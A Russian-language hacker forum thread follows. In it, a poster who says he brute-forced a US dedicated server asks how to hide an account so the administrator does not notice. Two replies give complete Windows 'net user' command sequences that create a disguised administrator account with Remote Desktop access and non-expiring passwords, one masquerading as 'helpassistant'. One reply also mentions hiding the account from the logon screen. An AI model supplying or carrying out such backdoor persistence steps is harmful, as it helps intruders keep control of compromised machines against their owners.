Люди извините что если не в теме спрашиваю но всеже плиз срочно помогите!!!!Сбрутил я хороший дед сша с каналом 30 мб и с хорошим конфигом,посоветуйте пожалуйста неопытному как скрыть на нем учетку чтобы админ меня не спалил!!!Ато дед хороший очень жаль терять такой!И кто отписывается описывайте процес поподробней пожалуйста!!!за ответы с меня плюсы и могу поделится дедами!!!!
Никак ! все учётки прекрасно просматриваются в Computer Management или в Active Directory , так что увы ...
маскируйся под helpassistant пуск выполнить cmd net user ИМЯ ПАРОЛЬ /add net localgroup Administrators ИМЯ /add net localgroup "Remote Desktop Users" ИМЯ /add net accounts /maxpwage:unlimited exit
Или создай учётку dont_delete_me_pleeeeease Это делается так: net user dont_delete_me_pleeeeease password/add net localgroup Administrators dont_delete_me_pleeeeease/add net localgroup "Remote Desktop Users" dont_delete_me_pleeeeease /add net accounts /maxpwage:unlimited А по поводу хэлп ассисанта,я тоже такую создаю,есть еще некоторые варианты...Где то на ачате был faq там было про то как скрыть из вин логона,тож сделай.Но ИМХО спалить могу легко.Особенно если дед хороший,значит и админ может быть не совсем идиотом)))